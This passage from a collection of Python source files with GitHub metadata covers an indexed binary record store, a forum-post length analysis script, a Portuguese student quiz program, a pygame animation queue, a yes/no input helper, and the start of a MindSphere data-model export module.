def _write_header(self):
buf = struct.pack(HEADERFORMAT,
MAGIC_NUMBER,
self.recordsize,
self.index_offset,
self.first_free)
self.fd.seek(0)
self.fd.write(buf)
self.fd.flush()
def open(self):
self.fd = self.path.open("r+b")
self._read_header()
self._read_index()
def create(self):
self.fd = self.path.open("w+b")
self.fd.truncate(self.index_offset)
self._write_header()
self.init_free_list()
self.fd.seek(0, 2) # position to end of file
self._writeint(0)
def _readint(self):
intblock = self.fd.read(INTSIZE)
return struct.unpack(INTBINFORMAT, intblock)[0]
def _writeint(self, value):
self.fd.write(struct.pack(INTBINFORMAT, value))
def record_number(self, i):
"""Offset of record #i"""
return i * self.recordsize + RECORDS_OFFSET
def first_record(self):
"""Offset of first record (record 0)"""
return self.record_number(0)
def last_record(self):
"""Offset of last record"""
num_records = self.current_size // self.recordsize
return self.record_number(num_records-1)
def init_free_list(self, start=0):
num_records = self.current_size // self.recordsize
for rn in range(start, num_records):
self.fd.seek(self.record_number(rn))
self._writeint(rn + 1)
self.fd.seek(self.last_record())
self._writeint(NO_MORE_RECORDS)
def _read_index(self):
self.fd.seek(self.index_offset)
keysize = self._readint()
while keysize:
keybytes = self.fd.read(keysize)
key = pickle.loads(keybytes)
idx = self._readint()
datasize = self._readint()
self.index[key] = (idx, datasize)
keysize = self._readint()
def _write_index(self):
self.fd.seek(self.index_offset)
for key in self.index:
idx, size = self.index[key]
keybytes = pickle.dumps(key)
self._writeint(len(keybytes))
self.fd.write(keybytes)
self._writeint(idx)
self._writeint(size)
self._writeint(0)
def close(self):
self._write_index()
self.fd.close()
def _allocate_records(self, numrecords):
n = 0
indices = []
recnum = self.first_free
while n < numrecords and recnum != NO_MORE_RECORDS:
indices.append(recnum)
n += 1
self.fd.seek(self.record_number(recnum))
recnum = self._readint()
if n < numrecords:
raise IndexedFileError("Out of space")
last = indices[-1]
self.fd.seek(self.record_number(last))
new_first_free = self._readint()
self.fd.seek(self.record_number(last))
self._writeint(NO_MORE_RECORDS)
self.first_free = new_first_free
self._write_header()
return indices
def allocate(self, numrecords):
"""
Return a list of free records, resizing the file if not enough
free records are available.
"""
free_list = []
while not free_list:
try:
free_list = self._allocate_records(numrecords)
except IndexedFileError as err:
if str(err) == "Out of space":
self.resize()
else:
raise
return free_list
def __setitem__(self, key, bytesval):
if key in self:
del self[key]
datasize = len(bytesval)
usable_rec_size = self.recordsize - INTSIZE
records_needed = datasize // usable_rec_size + 1
start = 0
free_list = self.allocate(records_needed)
for idx in free_list:
self.fd.seek(self.record_number(idx)+INTSIZE)
self.fd.write(bytesval[start:start+usable_rec_size])
start += usable_rec_size
first_record = free_list[0]
self.index[key] = (first_record, datasize)
self._write_index()
def retrieve(self, start):
"""
Retrieve the data of the records from start until a record
marked with NO_MORE_RECORDS
"""
usable_rec_size = self.recordsize - INTSIZE
idx = start
while idx != NO_MORE_RECORDS:
self.fd.seek(self.record_number(idx))
idx = self._readint()
yield self.fd.read(usable_rec_size)
def record_list(self, start):
"""
Return the record chain from start until NO_MORE_RECORDS
"""
idx = start
while True:
yield idx
self.fd.seek(self.record_number(idx))
idx = self._readint()
if idx == NO_MORE_RECORDS:
break
def last_in_chain(self, start):
"""
Return the last record in a chain starting by start.
The next_record field in its index should be NO_MORE_RECORDS
"""
for idx in self.record_list(start):
pass
return idx
    def __getitem__(self, key):
        first_record, datasize = self.index[key]
buf = b""
for chunk in self.retrieve(first_record):
buf += chunk
return buf[:datasize]
def resize(self):
num_records = self.current_size // self.recordsize
new_size = 2 * self.current_size
new_index_offset = new_size + RECORDS_OFFSET
self.index_offset = new_index_offset
self.fd.truncate(self.index_offset)
self.current_size = new_size
first_new_record = num_records
self.init_free_list(first_new_record)
if self.first_free != NO_MORE_RECORDS:
# not completely full, add new records to existing free space
idx = self.last_in_chain(self.first_free)
self.fd.seek(self.record_number(idx))
self._writeint(first_new_record)
else:
self.first_free = first_new_record
self._write_index()
self._write_header()
def __delitem__(self, key):
first_record, datasize = self.index[key]
del self.index[key]
self._write_index()
idx = self.last_in_chain(first_record)
self.fd.seek(self.record_number(idx))
self._writeint(self.first_free)
self.first_free = first_record
self._write_header()
def __contains__(self, key):
return key in self.index
def gen_keys(self):
for k in self.index.keys():
yield k
def __iter__(self):
class IDXFileIter:
def __init__(self2):
self2.gkeys = self.gen_keys()
def __next__(self2):
return next(self2.gkeys)
return IDXFileIter()
def keys(self):
return self.index.keys()
def values(self):
class IDXFileVals:
def __iter__(self2):
self2.gkeys = self.gen_keys()
return self2
def __next__(self2):
k = next(self2.gkeys)
return self[k]
return IDXFileVals()
def items(self):
class IDXFileItems:
def __iter__(self2):
self2.gkeys = self.gen_keys()
return self2
def __next__(self2):
k = next(self2.gkeys)
return k, self[k]
return IDXFileItems()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
```

authors: ["javier@llopis.me"]
author_id: javier@llopis.me
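A short usage sketch for the IndexedFile class above; the file name and keys are illustrative:

```python
# Create a new indexed file ('c' mode), store two values, and read them back.
with IndexedFile("demo.idx", mode="c", recordsize=64) as db:
    db["alpha"] = b"first payload"
    db["beta"] = b"x" * 200        # spans multiple records transparently

with IndexedFile("demo.idx", mode="r") as db:
    assert db["alpha"] == b"first payload"
    for key, value in db.items():
        print(key, len(value))
```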
---
### FirmlyReality/guba_sentiment · /preprocess/analysis.py

- blob_id: cf7ce4febb11b3a8679e9c6d7b02823b9dd3d85b | directory_id: 981422eab8715257cf50078ecff93d6e4153a9fb | content_id: ab53996f235ff1c5d88cc8429c22c00d1a1d2cc7
- detected_licenses: [] | license_type: no_license
- snapshot_id: d34227b99dc39ed28d41dc6b0b9f56dbf5564b24 | revision_id: b528d039ab8e80e8691e170ed2e7a9fd93bf8738 | branch_name: refs/heads/master
- visit_date: 2020-04-19T16:25:06.892886 | revision_date: 2019-05-04T07:26:51 | committer_date: 2019-05-04T07:26:51
- github_id: 168,303,237 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,949 | extension: py

content:

```python
import pandas as pd
import os, sys
import time
import collections
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python analysis.py <inputDir>")
exit(1)
starttime = time.time()
inputDir = sys.argv[1]
files = os.listdir(inputDir)
tiezi_lencount = collections.Counter()
reply_lencount = collections.Counter()
tiezicnt = 0
replyscnt = 0
stocks_crawled = set()
for dfile in files:
print("Read from %s" % dfile)
code = dfile.split('_')[0]
stocks_crawled.add(code)
ftype = dfile.split('_')[1].split('.')[0]
data = pd.read_csv(inputDir+"/"+dfile,dtype=str)
print("Groupby ...")
if ftype == "reply":
#lendata = data.groupby(lambda x:len(str(data.loc[x]['content']))).size()
lendata = [len(str(c)) for c in data['content']]
lencount = reply_lencount
else:
#lendata = data.groupby(lambda x:len(str(data.loc[x]['content'])+str(data.loc[x]['title']))+1).size()
lendata = [len(str(data.loc[i]['content'])) + len(str(data.loc[i]['title'])) + 1 for i in data.index]
lencount = tiezi_lencount
lencount.update(lendata)
'''for lenidx in lendata.index:
if lenidx not in lencount:
lencount[lenidx] = lendata[lenidx]
else:
lencount[lenidx] += lendata[lenidx]'''
if ftype == 'tiezi':
tiezicnt += len(data)
else:
replyscnt += len(data)
#print(lencount)
print(time.time()-starttime)
tiezi_df = pd.DataFrame.from_dict(dict(tiezi_lencount), orient='index')
tiezi_df.rename(columns={0:'tiezicnt'},inplace=True)
reply_df = pd.DataFrame.from_dict(dict(reply_lencount), orient='index')
reply_df.rename(columns={0:'replycnt'},inplace=True)
lencntdf = tiezi_df.join(reply_df,how="outer",sort=True)
print(lencntdf)
lencntdf.to_csv('lencnt.csv',index=True)
'''allcnt = tiezicnt + replyscnt
now = 0
for lenidx in lencntdf.index:
now += lencount[lenidx]
if now > 0.95*allcnt:
print("length %d is on 0.95" % (lenidx))
print("now=%d allcnt=%d"%(now,allcnt))
break'''
print("Total tiezi count: "+str(tiezicnt))
print("Total reply count: "+str(replyscnt))
print("Read from need_stock.txt and build stocks_need set...")
stockfile = open("need_stock.txt")
stocks_need = set()
lines = stockfile.read().splitlines()
stockfile.close()
for l in lines:
lsplits = l.split()
code = lsplits[0]
if code in stocks_need:
print("Error! code exists!")
exit(1)
stocks_need.add(code)
print("Need but not crawled: ")
print(str(stocks_need-stocks_crawled))
print("Crawled but not need: ")
print(str(stocks_crawled-stocks_need))
```

authors: ["firmlyzhu@163.com"]
author_id: firmlyzhu@163.com
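The commented-out block in the script above sketches a 95th-percentile length lookup; a working version over the exported lencnt.csv might look like this (column handling follows the script's own output format):

```python
import pandas as pd

# Re-load the length histogram written by the script above.
lencntdf = pd.read_csv('lencnt.csv', index_col=0).fillna(0)
counts = lencntdf['tiezicnt'] + lencntdf['replycnt']

allcnt = counts.sum()
now = 0
for length, cnt in counts.sort_index().items():
    now += cnt
    if now > 0.95 * allcnt:
        print("length %d is on 0.95" % length)
        print("now=%d allcnt=%d" % (now, allcnt))
        break
```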
---
### DanielXav/algoritmo-primeiro-periodo · /interpreText.py

- blob_id: 54bebeb806ed2a6d1e646e23ff48c820f6015356 | directory_id: f3ed28ec7242d335df9cbb2d49f5163f288b2b04 | content_id: 5c463ac0b6f12a9a9b7dcd92a6c87ca2386ef975
- detected_licenses: [] | license_type: no_license
- snapshot_id: 97e60bf558fbf59535608982c983bef757757ab5 | revision_id: 3743b8c221ddb05afa2ad9b9b78c3a5851636704 | branch_name: refs/heads/main
- visit_date: 2023-05-15T17:24:51.994832 | revision_date: 2021-06-15T17:31:55 | committer_date: 2021-06-15T17:31:55
- github_id: 377,242,913 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 20,458 | extension: py

content:

```python
from time import sleep
titulos = list()  # Lists and dictionaries
temas = list()
cadastro = dict()
historia = dict()
historias = list()
questoes = dict()
listaQuestoes = list()
listProfessores = list()
listAlunos = list()
prof = dict()
aluno = dict()
# TEACHER FUNCTIONS
def linha(tam=42):  # Helper to draw a separator line
return '-' * tam
def cadTemas():  # Register themes
try:
tema = str(input('\033[1;30mDigite o tema: \033[m')).capitalize()
if tema not in temas:
temas.append(tema)
print('\033[1;30mTema\033[m \033[1;32m{}\033[m armazenado!\033[m'.format(tema))
except (ValueError, TypeError):
print('\033[1;30mErro na leitura dos temas!\033[m')
return temas
def cadHistorias(tema, titulo, historias):  # Register stories
try:
historia.clear()
historia['tema'] = tema
historia['titulo'] = titulo
        historia[titulo] = str(input('\033[1;30mEntre com a historia: \033[m'))  # Each story is a dictionary inside a list
historias.append(historia.copy())
print('\033[1;32mHistoria armazenada!\033[m')
except (ValueError, TypeError):
print("\033[1;31mErro na leitura das histórias!\033[m")
return historias
def mostrarTitulo(historias):  # Show the titles of the available stories
print('\033[1;30mAs historias cadastradas foram: \n\033[m')
for historia in historias:
print(f'\033[1;34m{historia["titulo"]} \033[m')
def lerHistoria(historias):  # Show a story
mostrarTitulo(historias)
titulo = input("\033[1;30mDigite o titulo da historia a ser lida: \033[m")
print()
print('\033[1;30mA historia escolhida foi: \n\033[m')
print(f'\033[1;34m{titulo} \n\033[m')
for historia in historias:
if (historia['titulo'] == titulo):
print()
print(f'{historia[titulo]} \n\n')
def apagarHistoria(historias):  # Delete a story
mostrarTitulo(historias)
titulo = str(input("\033[1;30mQual a historia que voce deseja apagar? \033[m"))
apagada = False
for historia in historias:
if (historia['titulo'] == titulo):
historias.remove(historia)
apagada = True
break
if apagada:
print(f"\033[1;32mHistória {titulo} apagada! \033[m")
else:
print(f"\033[1;31mHistória {titulo} não encontrada! \033[m")
def printTemas(temas):  # Show the registered themes
print('\033[1;30mTemas cadastrados: \033[m')
if (len(temas) == 0):
print("\033[1;31mNao existem temas cadastrados\033[m")
for tema in temas:
print(tema)
def criarQuestoes(titulo):  # Create questions
    questoes = dict()  # Main dictionary, one key
    perguntas = dict()
    pergunta1 = dict()  # Secondary dictionary
respostas1 = dict()
pergunta2 = dict()
respostas2 = dict()
pergunta3 = dict()
respostas3 = dict()
pergunta4 = dict()
respostas4 = dict()
pergunta5 = dict()
respostas5 = dict()
pergunta1['pergunta'] = str(input("\033[1;30mEntre com a primeira pergunta: \033[m"))
sleep(0.3)
print('Digite 5 respostas: ')
respostas1['a'] = str(input("\033[1;30mEntre com a resposta a: \033[m"))
respostas1['b'] = str(input("\033[1;30mEntre com a resposta b: \033[m"))
respostas1['c'] = str(input("\033[1;30mEntre com a resposta c: \033[m"))
respostas1['d'] = str(input("\033[1;30mEntre com a resposta d: \033[m"))
respostas1['e'] = str(input("\033[1;30mEntre com a resposta e: \033[m"))
sleep(0.3)
pergunta1['respostas'] = respostas1
pergunta1['resposta_certa'] = str(input("\033[1;30mEntre com o item da resposta certa: \033[m"))
perguntas['Pergunta 1'] = pergunta1
############################ Pergunta 2 #######################################
pergunta2['pergunta'] = input('Entre com a pergunta 2: ')
sleep(0.3)
print('Digite 5 respostas: ')
respostas2['a'] = str(input("Entre com a resposta a: "))
respostas2['b'] = str(input("Entre com a resposta b: "))
respostas2['c'] = str(input("Entre com a resposta c: "))
respostas2['d'] = str(input("Entre com a resposta d: "))
respostas2['e'] = str(input("Entre com a resposta e: "))
sleep(0.3)
pergunta2['respostas'] = respostas2
pergunta2['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
perguntas['Pergunta 2'] = pergunta2
########################### Pergunta 3 #######################################
pergunta3['pergunta'] = input('Entre com a pergunta 3: ')
sleep(0.3)
print('Digite 5 respostas: ')
respostas3['a'] = str(input("Entre com a resposta a: "))
respostas3['b'] = str(input("Entre com a resposta b: "))
respostas3['c'] = str(input("Entre com a resposta c: "))
respostas3['d'] = str(input("Entre com a resposta d: "))
respostas3['e'] = str(input("Entre com a resposta e: "))
sleep(0.3)
pergunta3['respostas'] = respostas3
pergunta3['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
perguntas['Pergunta 3'] = pergunta3
#
# ############################ Pergunta 4 #######################################
#
# pergunta3['pergunta'] = input('Entre com a pergunta 4: ')
#
# print('Digite 5 respostas: ')
#
# respostas4['a'] = str(input("Entre com a resposta a: "))
# respostas4['b'] = str(input("Entre com a resposta b: "))
# respostas4['c'] = str(input("Entre com a resposta c: "))
# respostas4['d'] = str(input("Entre com a resposta d: "))
# respostas4['e'] = str(input("Entre com a resposta e: "))
#
# pergunta4['respostas'] = respostas4
# pergunta4['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
# perguntas['Pergunta 4'] = pergunta4
#
# ############################ Pergunta 4 #######################################
#
# pergunta5['pergunta'] = input('Entre com a pergunta 5: ')
#
# print('Digite 5 respostas: ')
#
# respostas5['a'] = str(input("Entre com a resposta a: "))
# respostas5['b'] = str(input("Entre com a resposta b: "))
# respostas5['c'] = str(input("Entre com a resposta c: "))
# respostas5['d'] = str(input("Entre com a resposta d: "))
# respostas5['e'] = str(input("Entre com a resposta e: "))
#
# pergunta5['respostas'] = respostas5
# pergunta5['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
# perguntas['Pergunta 5'] = pergunta5
questoes[titulo] = perguntas
listaQuestoes.append(questoes.copy())
return listaQuestoes
def leiaInt(msg):  # Validate an integer input
while True:
try:
n = int(input(msg))
except (ValueError, TypeError):
print('\033[31mERRO: por favor, digite um numero inteiro valido.\033[m')
continue
except (KeyboardInterrupt):
print('\n\033[31mUsuario preferiu nao digitar esse numero.\033[m')
return 0
else:
return n
def cabecalho(txt):  # Print a header
print(linha())
print(txt)
print(linha())
def menu(lista):  # Teachers' main menu
cabecalho('\033[1;35mMENU PRINCIPAL\033[m')
for c, iten in enumerate(lista):
sleep(0.3)
print(f'\033[1;30m{c + 1} - \033[m\033[1;36m{iten}\033[m')
print(linha())
opc = leiaInt('\033[1;30mSua Opcao: \033[m')
return opc
# STUDENT FUNCTIONS
# takes the stories as a parameter
def verificarTemas(historias):  # Checks whether a theme is repeated and adds it to the list
    temaAleatorio = set()  # Create the set
    for historia in historias:
        temaAleatorio.add(historia['tema'])  # the set already rejects duplicate elements
    temaAleatorio = list(temaAleatorio)  # turn the set into a list, since sets have no defined order
    for i, tema in enumerate(temaAleatorio, start=1):  # SHOW THEMES
        print(f' \033[1;30m{i} -\033[m \033[1;36m{tema}\033[m')
        sleep(0.3)
    return temaAleatorio  # return the list of themes
def leiaOpcao(historias, listaQuestoes):
dicionario = dict()
    while True:  # keep asking until the choice is valid
try:
escolha = int(
input(('\033[1;30mDigite o número que está relacionado com o tema a sua escolha: \033[m')))
print()
            if 1 <= escolha <= len(temaAleatorio):  # the user picks one of the listed themes
                break  # valid choice, leave the while
else:
print(f'\033[1;31mNúmero deve estar entre 1 e {len(temaAleatorio)}\033[m')
        except ValueError:  # raised if the input is not a number
print('\033[1;31mDigite um número válido\033[m')
cont = 0
tema_escolhido = temaAleatorio[escolha - 1]
for historia in historias:
        if historia['tema'] == tema_escolhido:  # If the story has the chosen theme
cont += 1
if cont > 0:
print('\033[1;30mTítulos das histórias do tema escolhido:\033[m')
for historia in historias:
            if historia['tema'] == tema_escolhido:  # Show the titles of the chosen theme
titulo = historia['titulo']
print(f'\033[1;34m{titulo}\033[m')
sleep(0.5)
print()
sair = 0
while sair == 0:
try:
titulo = input('\033[1;30mDigite a história você deseja ler e responder as questões: \033[m')
for historia in historias:
                if historia['titulo'] == titulo:  # pick among the titles of the chosen theme
print()
print(f'{historia[titulo]} \n\n')
sair = 1
except:
print('\033[1;30mO título que digitou não existe!\033[m')
    # QUESTIONS
    for i in range(len(listaQuestoes)):  # Which questions belong to the chosen title
        if titulo in listaQuestoes[i]:  # Relates the questions to their respective title
            dicionario = listaQuestoes[i]
perguntas = dicionario[titulo]
respostasCertas = 0
    for pk, pv in perguntas.items():  # pk is the question number, pv is the question data
print(f'{pk}: {pv["pergunta"]}')
print('\033[1;30mEscolha uma das opções: \033[m')
        for rk, rv in pv['respostas'].items():  # rk - option letter, rv - option text
print(f'[{rk}]: {rv}')
sleep(0.3)
sleep(3)
respostaUsuario = input('\033[1;30mSua resposta: \033[m')
if respostaUsuario == pv['resposta_certa']:
sleep(0.3)
print('\033[1;32mMuito bem! Você acertou.\033[m')
respostasCertas += 1
else:
sleep(0.3)
print('\033[1;31mErrou! Preste mais atenção!\033[m')
print()
quantPerguntas = len(perguntas)
if quantPerguntas > 0:
sleep(1)
        porcentagemAcerto = respostasCertas / quantPerguntas * 100  # Percentage of correct answers
print(f'\033[1;30mVocê acertou {respostasCertas} resposta(s).\033[m')
print(f'\033[1;30mSua porcentagem foi {porcentagemAcerto}%\033[m')
sleep(0.5)
else:
sleep(1)
print('\033[1;31mInfelizmente você não acertou nenhuma resposta!\033[m')
# REGISTRATION FUNCTIONS
def cadastrarProfessor():  # Register a teacher
prof['nomeProfessor'] = input('\033[1;30mDigite o nome do professor que você deseja cadastrar: \033[m')
prof['matriculaProfessor'] = input('\033[1;30mDigite a matricula do professor: \033[m')
prof['senhaProfessor'] = input('\033[1;30mDigite a senha do professor: \033[m')
listProfessores.append(prof.copy())
return listProfessores
def cadAdm():  # Register the admins
inicio = 0
if inicio == 0:
nomeAdm = input('\033[1;30mDigite o seu primeiro nome: \033[m')
senhaAdm = input('\033[1;30mCadastre uma senha: \033[m')
inicio = 1
sleep(1)
print('\033[1;32mCadastrado como administrador do programa!!\033[m')
cont = 3
while cont > 0:
sleep(0.5)
senha = input('\033[1;30mDigite sua senha de administrador para acessar o programa: \033[m')
if (senhaAdm == senha):
erro = 1
while erro == 1:
try:
esc = input('\033[1;30mCadastrar matricula de um professor? [Sim/Nao] \033[m').strip().lower()[0]
erro = 0
except:
print('\033[1;31mDigite Sim ou Não!\033[m')
while esc == 's':
cadastrarProfessor()
sleep(0.5)
print('\033[1;32mCadastrado com sucesso!\033[m')
sleep(0.5)
erro = 1
while erro == 1:
try:
esc = input('\033[1;30mCadastrar nova matricula? [Sim/Nao] \033[m').strip().lower()[0]
erro = 0
except:
print('\033[1;31mDigite sim ou não!\033[m')
break
else:
cont -= 1
print(f'\033[1;31mVocê tem {cont} chances.\033[m')
def cadastrarUsuarios():  # Calls the registration functions and also performs registrations
op = -1
aluno = dict()
while op != 0:
linha(42)
print('\033[1;30m1 - \033[m\033[1;36mLogin Admin\033[m')
sleep(0.3)
print('\033[1;30m2 - \033[m\033[1;36mLogin Professor\033[m')
sleep(0.3)
print('\033[1;30m3 - \033[m\033[1;36mLogin Aluno\033[m')
sleep(0.3)
print('\033[1;31m0 - SAIR\033[m')
sleep(0.3)
while op != 0:
try:
                op = int(input(('\033[1;30mDigite a sua opção: \033[m')))  # validates that the input is an int
break
except ValueError: # se não digitar número, dá erro
print('\033[1;31mDigite um número válido\033[m')
        if op == 1:  # If 1, register the admin
cadAdm()
        elif op == 2:  # If 2, log the teacher in
matricula = input('\033[1;30mDigite sua matricula: \033[m')
for i in range(len(listProfessores)):
if matricula in listProfessores[i]['matriculaProfessor']:
cont = 3
while cont > 0:
senha = input('\033[1;30mDigite sua senha: \033[m')
if senha in listProfessores[i]['senhaProfessor']:
print('\033[1;32mLogado com sucesso!\033[m')
op = 2
return op
else:
cont -= 1
print(f'Você tem {cont} chances.')
else:
print('\033[1;31mMatricula não encontrada. Por favor procure a coordenação.\033[m')
else:
print('\033[1;31mMatricula não encontrada. Por favor procure a coordenação.\033[m')
        elif op == 3:  # If 3, register or log the student in
erro = 1
while erro == 1:
try:
                    loginAluno = input('\033[1;30mDeseja se cadastrar ou logar? [Cadastrar/logar] \033[m').strip().lower()[0]  # strip removes surrounding spaces, lower() lowercases, [0] takes the first letter
erro = 0
except:
print('\033[1;31mOpção inválida!\033[m')
if loginAluno == 'c':
aluno['nome'] = input('\033[1;30mDigite o seu nome: \033[m')
aluno['matricula'] = input('\033[1;30mDigite sua matricula: \033[m')
senha1 = input('\033[1;30mDigite sua senha: \033[m')
senha2 = input('\033[1;30mConfirme sua senha: \033[m')
while senha1 != senha2:
print('\033[1;31mSenhas diferentes. Tente novamente!\033[m')
senha1 = input('\033[1;30mDigite sua senha: \033[m')
senha2 = input('\033[1;30mConfirme sua senha: \033[m')
aluno['senha'] = senha2
listAlunos.append(aluno.copy())
print('\033[1;32mCadastrado com sucesso!\033[m')
elif loginAluno == 'l':
matricula = input('\033[1;30mDigite sua matricula: \033[m')
if matricula.isnumeric():
for i in range(len(listAlunos)):
if matricula in listAlunos[i]['matricula']:
cont = 3
while cont > 0:
senha = input('\033[1;30mDigite sua senha: \033[m')
if senha in listAlunos[i]['senha']:
print('\033[1;32mLogado com sucesso!\033[m')
op = 3
return op
else:
cont -= 1
print(f'\033[1;30mVocê tem {cont} chances.\033[m')
else:
print('\033[1;30mMatricula não encontrada. Por favor cadastre-se!\033[m')
else:
print('\033[1;30mDigite número no campo.\033[m')
else:
print('\033[1;30mOpção Inválida! Tente Novamente!\033[m')
elif op == 0:
exit()
else:
print('\033[1;30mOpção invalida\033[m')
######################################## Main Program ########################################
# Calls the main functions
op = -1
while (op != 0):
op = cadastrarUsuarios()
listaMenu = ['Cadastrar tema', 'Cadastrar historia', 'Mostrar titulos', 'Ler historia',
'Apagar historia', 'Mostrar temas', 'Criar questoes', 'Sair do Sistema']
if op == 2:
resposta = 1
while (resposta != len(listaMenu)):
resposta = menu(listaMenu)
if (resposta == 1):
cadTemas()
elif (resposta == 2):
printTemas(temas)
sair = 0
chances = 3
while (chances > 0):
tema = str(input('\033[1;30mEntre com o tema: \033[m')).capitalize()
if (tema in temas):
break
print("\033[1;31mTema inexistente, por favor tente outra vez!\033[m")
chances -= 1
print(f'\033[1;31mVoce tem {chances} chances!\033[m')
                if (tema in temas):  # only proceed when a valid theme was entered
titulo = str(input('\033[1;30mEntre com o titulo da historia: \033[m'))
cadHistorias(tema, titulo, historias)
elif (resposta == 3):
mostrarTitulo(historias)
elif (resposta == 4):
lerHistoria(historias)
elif (resposta == 5):
apagarHistoria(historias)
elif (resposta == 6):
printTemas(temas)
elif (resposta == 7):
mostrarTitulo(historias)
                titulo = str(input('\033[1;30mEntre com o titulo da historia: \033[m'))  # validation needed here
questoes = criarQuestoes(titulo)
elif resposta == (len(listaMenu)):
cabecalho('\033[1;30mSaindo do sistema... Ate logo!\033[m')
else:
print('\033[31mERRO! Digite uma opcao valida!\033[m')
sleep(5)
elif op == 3:
temaAleatorio = verificarTemas(historias)
leiaOpcao(historias, listaQuestoes)
```

authors: ["noreply@github.com"]
author_id: DanielXav.noreply@github.com
---
### allynbauer/nspygame · /animation_queue.py

- blob_id: cb8bbb18812b781c6011712f275d27da47b49467 | directory_id: 4180adc91a4f90580597df0f2eb631f71706b416 | content_id: 0c18144c83ea7cb47f634c1eca603854ba2a68b8
- detected_licenses: [] | license_type: no_license
- snapshot_id: 8935a7329109d29c535c652485329debf44d2295 | revision_id: 8fb8d2dce7d4444636c358cf60f0e27da2584dee | branch_name: refs/heads/master
- visit_date: 2021-01-01T19:52:34.185553 | revision_date: 2013-03-31T16:01:44 | committer_date: 2013-03-31T16:01:44
- github_id: null | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 633 | extension: py

content:

```python
from animation import *
class AnimationQueue(object):
def __init__(self):
self.animations = []
def add_animation(self, animation):
assert animation is not None
animation.queue = self
animation.began = pygame.time.get_ticks() # TODO: replace with clock
self.animations.append(animation)
def tick(self, clock):
for animation in self.animations:
animation.tick(clock)
        # Materialize the filter first: removing items from self.animations while
        # a lazy filter iterates over it would skip elements in Python 3.
        finished_animations = list(filter(lambda animation: animation.animation_finished, self.animations))
for animation in finished_animations:
if callable(animation.finished_block):
animation.finished_block()
self.animations.remove(animation)
```

authors: ["allyn.bauer@gmail.com"]
author_id: allyn.bauer@gmail.com
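A usage sketch under stated assumptions: the `Animation` class imported above is assumed to take a duration, expose `animation_finished`, and allow a `finished_block` callback, which is how `AnimationQueue.tick` uses it:

```python
import pygame

pygame.init()
clock = pygame.time.Clock()

queue = AnimationQueue()
anim = Animation(duration=500)               # assumed constructor signature
anim.finished_block = lambda: print("done")  # invoked once the animation finishes

queue.add_animation(anim)                    # stamps `began` via pygame's tick count

# Typical game loop: tick the queue once per frame.
# while running:
#     clock.tick(60)
#     queue.tick(clock)
```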
---
### konelliusbriggs/01_Lucky_Unicorn · /02_yes_no.py

- blob_id: 8f58ceac773c503d7bcc188d51ad3750de9f0467 | directory_id: 02d2657ca9d835996d0d9a883820f9f5d9e688bb | content_id: e14aa95c22450d33484e21d5718f74092dcaec70
- detected_licenses: [] | license_type: no_license
- snapshot_id: 8c459b2dee4207fef3ca5bc49ed53f5c23a24fbf | revision_id: 673bf493f5ebb322df9d7b7248a628625a58bfc4 | branch_name: refs/heads/main
- visit_date: 2023-03-26T08:59:52.569920 | revision_date: 2021-03-25T23:45:49 | committer_date: 2021-03-25T23:45:49
- github_id: 351,277,634 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 395 | extension: py

content:

```python
def yes_no(question):
valid = False
while not valid:
response = input(question).lower()
if response == "y" or response == "yes":
return "yes"
elif response == "n" or response == "no":
return "no"
else:
print("Please enter yes / no")
played_before = yes_no("Have you played this game before? ")
if played_before != "yes":
print("show instructions")
```

authors: ["briggsk9489@masseyhigh.school.nz"]
author_id: briggsk9489@masseyhigh.school.nz
---
### mindsphere/dataModelHandler · /modules/export.py

- blob_id: 4989fa19a6d22301de71b13a5c533c0d567f84a2 | directory_id: ef714898ec6c6b7084770a488cd03f40586caa08 | content_id: e55995848324804dcdcc0fed5aba64727b5b2a75
- detected_licenses: ["MIT"] | license_type: permissive
- snapshot_id: 24e9633c921e219b4d35458b1773bee20a66e6a6 | revision_id: 6d5f415976794802ca8ccea66b26b2a7bcbec751 | branch_name: refs/heads/master
- visit_date: 2023-04-28T16:59:11.470104 | revision_date: 2021-05-18T14:32:55 | committer_date: 2021-05-18T14:32:55
- github_id: 368,198,045 | star_events_count: 1 | fork_events_count: 1
- gha_license_id: null | gha_event_created_at: 2021-05-18T14:32:12 | gha_created_at: 2021-05-17T13:35:29 | gha_language: Python
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 12,157 | extension: py

content:

```python
import uuid
import requests
import json
import datetime, traceback
import os
import sys
import configparser
import traceback
import csv
from pprint import pprint
import collections
from pathlib import Path
import helpers
#Custom Modules
import modules.readConfig as config
from modules.helpers import SimpleError, SingleAssetImporterInputDataset, SingleAgentInputDataset, SingleDatapointInputDataset
from modules.mindsphereApiCollection import *
from modules.datamodelClassDefinitions import Asset, AssetType, Aspect, ImportStatus
from modules.rowProcessor import convertRowsToClasses, extractAssetDefinitions, extractAspectDefinitions, extractAssetTypeDefinitions
from modules.mindsphereDataModelManager import MindsphereDataModelManager
from modules.apiHandler import ScopeNotFound
#######################################
########### MODULE CONFIG #############
#######################################
# The following block loads parameters from the config and provides them in an easy-to-use way in this module:
# instead of config.<parametername> you can just use <parametername> on its own afterwards
thisModule = sys.modules[__name__]
requiredParameters = "logging, tenantname, parentIdsToBeExported, exportMode, exportedDataOutputFile, exportAgentAndMappingConfiguration, convertToNeutralIds"
config.setSimpleConfigParametersToModule(thisModule, requiredParameters)
#Create Directory for Output#
agentDefinitionsFileName = "agentDefinition.csv"
directory = os.path.dirname(exportedDataOutputFile)
Path(directory).mkdir(parents=True, exist_ok=True)
#######################################
######### HELPER FUNCTIONS ############
#######################################
def convertMappingDictToOrderedColumnDict(mappingDict):
